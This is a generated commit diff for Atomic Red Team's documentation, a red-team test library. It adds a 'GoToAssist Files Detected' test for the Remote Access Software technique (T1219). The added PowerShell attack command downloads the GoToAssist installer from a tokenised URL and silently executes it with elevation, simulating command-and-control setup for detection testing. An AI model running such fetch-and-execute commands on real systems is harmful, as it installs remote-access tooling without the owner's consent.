Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
This commit is contained in:
CircleCI Atomic Red Team doc generator
parent
a8dc0e3b07
commit
8afe7ccfd9
@@ -876,6 +876,7 @@ command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used p
|
||||
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
|
||||
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
|
||||
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
|
||||
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
|
||||
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
|
||||
command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
|
||||
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
|
||||
|
||||
|
@@ -538,6 +538,7 @@ command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used p
|
||||
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
|
||||
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
|
||||
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
|
||||
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
|
||||
command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
|
||||
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
|
||||
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
|
||||
|
||||
|
@@ -1590,6 +1590,7 @@
|
||||
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
|
||||
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
|
||||
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
|
||||
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
|
||||
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
|
||||
- Atomic Test #1: Base64 Encoded data. [macos, linux]
|
||||
- Atomic Test #2: XOR Encoded data. [windows]
|
||||
|
||||
@@ -985,6 +985,7 @@
|
||||
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
|
||||
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
|
||||
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
|
||||
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
|
||||
- [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
|
||||
- Atomic Test #2: XOR Encoded data. [windows]
|
||||
- T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
@@ -66352,6 +66352,23 @@ command-and-control:
|
||||
$file1 -ErrorAction Ignore"
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: GoToAssist Files Detected Test on Windows
|
||||
auto_generated_guid: 1b72b3bd-72f8-4b63-a30b-84e91b9c3578
|
||||
description: 'An adversary may attempt to trick the user into downloading GoToAssist
|
||||
and use to establish C2. Download of GoToAssist installer will be at the destination
|
||||
location and ran when sucessfully executed.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
|
||||
$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
|
||||
Start-Process $file1 /S;
|
||||
cleanup_command: try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{}
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1132.001:
|
||||
technique:
|
||||
external_references:
|
||||
|
||||
@@ -14,6 +14,8 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
|
||||
|
||||
- [Atomic Test #3 - LogMeIn Files Detected Test on Windows](#atomic-test-3---logmein-files-detected-test-on-windows)
|
||||
|
||||
- [Atomic Test #4 - GoToAssist Files Detected Test on Windows](#atomic-test-4---gotoassist-files-detected-test-on-windows)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -124,4 +126,38 @@ Remove-Item $file1 -ErrorAction Ignore
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - GoToAssist Files Detected Test on Windows
|
||||
An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 1b72b3bd-72f8-4b63-a30b-84e91b9c3578
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
|
||||
|
||||
|
||||
```powershell
|
||||
Invoke-WebRequest -OutFile C:\Users\$env:username\Downloads\GoToAssist.exe "https://launch.getgo.com/launcher2/helper?token=e0-FaCddxmtMoX8_cY4czssnTeGvy83ihp8CLREfvwQshiBW0_RcbdoaEp8IA-Qn8wpbKlpGIflS-39gW6RuWRM-XHwtkRVMLBsp5RSKp-a3PBM-Pb1Fliy73EDgoaxr-q83WtXbLKqD7-u3cfDl9gKsymmhdkTGsXcDXir90NqKj92LsN_KpyYwV06lIxsdRekhNZjNwhkWrBa_hG8RQJqWSGk6tkZLVMuMufmn37eC2Cqqiwq5bCGnH5dYiSUUsklSedRLjh4N46qPYT1bAU0qD25ZPr-Kvf4Kzu9bT02q3Yntj02ZA99TxL2-SKzgryizoopBPg4Ilfo5t78UxKTYeEwo4etQECfkCRvenkTRlIHmowdbd88zz7NiccXnbHJZehgs6_-JSVjQIdPTXZbF9T5z44mi4BQYMtZAS3DE86F0C3D4Tcd7fa5F6Ve8rQWt7pvqFCYyiJAailslxOw0LsGyFokoy65tMF980ReP8zhVcTKYP8s8mhGXihUQJQPNk20Sw&downloadTrigger=restart&renameFile=1"
|
||||
$file1 = "C:\Users\" + $env:username + "\Downloads\GoToAssist.exe"
|
||||
Start-Process $file1 /S;
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
```powershell
|
||||
try{$PathToAtomicsFolder/T1219/Bin/GoToCleanup.ps1} catch{}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
Reference in New Issue
Block a user